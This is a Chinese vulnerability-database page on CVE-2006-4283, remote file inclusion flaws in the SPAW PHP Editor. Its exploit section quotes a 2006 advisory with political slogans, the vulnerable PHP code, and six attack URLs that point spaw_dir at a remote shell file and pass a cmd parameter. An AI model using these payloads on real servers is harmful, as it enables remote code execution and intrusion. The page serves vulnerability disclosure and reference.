SPAW PHP Editor 多个PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193755 漏洞类型 输入验证
发布时间 2006-08-22 更新时间 2006-08-26
CVE编号 CVE-2006-4283 CNNVD-ID CNNVD-200608-364
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006080141
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-364
|漏洞详情
SOLMETRASPAWEditor1.0.6和1.0.7版本中存在多个PHP远程文件包含漏洞,远程攻击者可借助dialogs/脚本,包括:(1)a.php,(2)collorpicker.php,(3)img.php,(4)img_library.php,(5)table.php或(6)td.php脚本中spaw_dir参数中的URL执行任意PHP代码。
|漏洞EXP
* Kurdish Security Advisory

* Spaw Editor Remote Include Vulnerability

* Our Party is PKK, Our Army HPG, We will Earn

* contact ? : irc.gigachat.net #kurdhack & botan (at) linuxmail (dot) org [email concealed]

* Risk : High

* Class : Remote

* Script : Spaw Editor

* Version : v1.6 and v1.7

* Site :  www.solmetra.com

<?

// include wysiwyg config

include '../config/spaw_control.config.php';

include $spaw_root.'class/lang.class.php';

$theme = empty($HTTP_GET_VARS['theme'])?$spaw_default_theme:$HTTP_GET_VARS['theme
'];

$theme_path = $spaw_dir.'lib/themes/'.$theme.'/';

$l = new SPAW_Lang($HTTP_GET_VARS['lang']);

$l->setBlock('colorpicker');

?>

http://site.com/[path]/dialogs/a.php?spaw_dir=http://www.shell.txt?&cmd=
id

http://site.com/[path]/dialogs/collorpicker.phpspaw_dir=http://www.shell
.txt&cmd=id

http://site.com/[path]/dialogs/img.php?spaw_dir=http://www.shell.txt?&cm
d=id

http://site.com/[path]/dialogs/img_library.php?spaw_dir=http://www.shell
.txt?&cmd=id

http://site.com/[path]/dialogs/table.php?spaw_dir=http://www.shell.txt?&
cmd=id

http://site.com/[path]/dialogs/td.php?spaw_dir=http://www.shell.txt?&cmd
=id

Speacial MSG! : The Turk state is the aggressor behavior Don't stay quite. Hear the Kurdish people is scream be late.. Stop the Turkey Military!
|参考资料

来源:BID
名称:19603
链接:http://www.securityfocus.com/bid/19603
来源:BUGTRAQ
名称:20060819[KurdishSecurity#23]SpawEditorRemoteIncludeVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/443752/100/0/threaded
来源:XF
名称:spaweditor-spawdir-file-include(28466)
链接:http://xforce.iss.net/xforce/xfdb/28466
来源:SREASON
名称:1432
链接:http://securityreason.com/securityalert/1432